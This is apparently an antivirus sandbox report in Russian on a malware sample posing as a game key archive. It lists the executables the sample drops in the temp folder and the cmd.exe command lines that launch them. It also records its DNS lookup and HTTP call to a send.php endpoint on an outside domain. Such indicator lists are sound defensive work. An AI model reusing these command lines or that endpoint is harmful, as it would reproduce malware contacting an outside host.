Техническая информация
- '%TEMP%\clr_gg.exe' metro2013.mistralaucanada.com Ufc-undisputed-2011-pc-klyuch.zip
- '%TEMP%\setup_fff.exe' 6cd79577d3f515f03593337269ea7211 metro2013.mistralaucanada.com /images/srvr/partner/send.php 5
- '<SYSTEM32>\wbem\wmiadap.exe' /R /T
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\clr_gg.exe.bat" clr_gg.exe metro2013.mistralaucanada.com Ufc-undisputed-2011-pc-klyuch.zip"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\setup_fff.exe.bat" setup_fff.exe 6cd79577d3f515f03593337269ea7211 metro2013.mistralaucanada.com /images/srvr/partner/send.php 5"
- %TEMP%\1ec5ea1bdcfe4c4d9bbf2a8c514c51a2
- %TEMP%\clr_gg.exe
- %TEMP%\setup_fff.exe
- <SYSTEM32>\wbem\Performance\WmiApRpl.ini
- <SYSTEM32>\PerfStringBackup.TMP
- %TEMP%\setup_fff.exe
- %TEMP%\1ec5ea1bdcfe4c4d9bbf2a8c514c51a2
- %TEMP%\clr_gg.exe
- 'me#######.mistralaucanada.com':80
- me#######.mistralaucanada.com/images/srvr/partner/send.php
- DNS ASK me#######.mistralaucanada.com
- ClassName: 'Shell_TrayWnd' WindowName: ''